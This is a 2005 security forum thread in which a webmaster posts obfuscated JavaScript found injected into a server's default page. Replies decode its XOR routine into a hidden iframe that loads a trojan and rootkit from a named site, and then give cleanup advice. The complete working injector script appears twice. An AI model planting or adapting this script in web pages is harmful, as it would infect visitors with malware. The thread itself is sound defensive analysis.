-
December 24th, 2005, 12:47 AM
#1
Junior Member
Virus code on a webpage?
I found this code lurking on one of my webpages that was mysteriously uploaded
It downloads a trojan apparently each time a person visited a page on my site
does anyone knwo what this code is and whats its translated too???
<script>x=94;es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;145;130;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds)</script></body>
-
December 24th, 2005, 01:26 AM
#2
It looks vaguely like the SCOB javascript trojan or some sort of variant?
-
December 24th, 2005, 01:38 AM
#3
I found this code lurking on one of my webpages that was mysteriously uploaded
Nihil. I tried giving you (+) points but
You have given out too many AntiPoints today, try again later.
So when I have the chance I will.
Back to the issue at hand Mysteriously uploaded? Hmmm. I am assuming your website is www.siteprosecurity.com which page has the malicious code on it? I checked it's not the index page? I also, wanted to see what webserver is running your site.
http://toolbar.netcraft.com/site_rep...rosecurity.com
-
December 24th, 2005, 02:29 AM
#4
Junior Member
Originally posted here by Computernerd22
Nihil. I tried giving you (+) points but
So when I have the chance I will.
Back to the issue at hand Mysteriously uploaded? Hmmm. I am assuming your website is www.siteprosecurity.com which page has the malicious code on it? I checked it's not the index page? I also, wanted to see what webserver is running your site.
http://toolbar.netcraft.com/site_rep...rosecurity.com
hey!
Actually nah its not on the siteprosecurity site dont have that no more first time ive posted here in 2 yrs
It was actually on my webserver under the cpanel skelton directory
i registered a domain name for a client today and have this default holding page for all new clients and that code appeared somehow on the default holding page!
im running apache/linux on my server!
cheers!
-
December 24th, 2005, 02:37 AM
#5
It translates to:
PHP Code:
<iframe src="http://www.bestswf.com/index.php" width=0 height=0></iframe>
That site then tries to load /xxx.ani, which in turn will go for: (sanitized URL)
htXtp://www.bestswf.com/web.exe
web.exe will use some code known as EliRT 1.01, which looks like rootkit stuff.
Virustotal doesn't like web.exe
Have fun nihil!
edit...
by the way siteprosecurity , that means you've been owned
-
December 24th, 2005, 03:00 AM
#6
Junior Member
hmm thanks for that
ok owned i guess means that some person has had access to the root of the server?
everything else seems to be intact and all although last weekend i do remember the server suffering badly and alll but its been ok since then?
anyone got tips to move on from here?
i have rkhunter installed did not pick up anything
-
December 24th, 2005, 04:05 AM
#7
-
December 25th, 2005, 12:10 AM
#8
Originally posted here by siteprosecurity
hmm thanks for that
ok owned i guess means that some person has had access to the root of the server?
You probably have some hidden files located on the server. I've found them hidden in the recycle bins in the past, and in some of the OS system folders. I'd use the Sysinternals Rootkit Revealer and do some safemode hunting. 'course, first thing is to change all the local admin passwords, domain passwords and check for odd new local accounts.
[Edit]
Or, if you take nihil's suggestion, just unplug from the net, isolate and wait for the forensics team.
[/Edit]
-
December 27th, 2005, 01:30 PM
#9
To find out how Soda_Popinsky got the <iframe> tag...
(I'm going to assume windows to find out what it does)
The piece of script is javascript.. Copy 'n past the code into notepad and save as test.js
Then edit it a bit to make it more readable...
Code:
x=94;
es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;145;130;";
var ds=new String();
ads=es.split(";");
k=ads.length-1;
for(var j=0;j<k;j++){
e=ads[j];
gg="d=e";
gg=gg+"^x";
eval(gg);
x+=1;
ds=ds+String.fromCharCode(d);
}
WScript.Echo(ds)
Change that last eval statement into a WScript.Echo (bold in the code) and run it with cscript..
What it basicly does is it splits the string es into it's seperate pieces.. For the first one e becomes 58. gg will contain d=e^x, x=94 at first. After the eval statement d=100 (d=58 XOR 94). You can change the whole gg=.... eval(gg) into d=e^x. Next it adds 1 to x for the next round. Then it converts the decimal 100 into it's ASCII character (d) and adds it to ds. The last statement (eval; which I changed to WScript.Echo) executes the string ds (which at the end contains 'document.write('<iframe src="http://www.bestswf.com/index.php" width=0 height=0></iframe>');').
anyone got tips to move on from here?
Yep.. Backup all the important stuff and reinstall the server from scratch using the original installation CD's. Don't forget to patch it afterwards (and plug the hole they used to get in)..
Oliver's Law:
Experience is something you don't get until just after you need it.
-
December 27th, 2005, 07:15 PM
#10
well I gotta ask. Couldn't this, (and most likely) be a XSS attack. I dont know if they comprimised root... On you web page(s), do you use any .php or .asp or anything similarily dynamic ? Are you sure it was an 'uploaded' page and not XSS ?
The fool doth think he is wise, but the wiseman knows himself to be a fool - Good Ole Bill Shakespeare
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|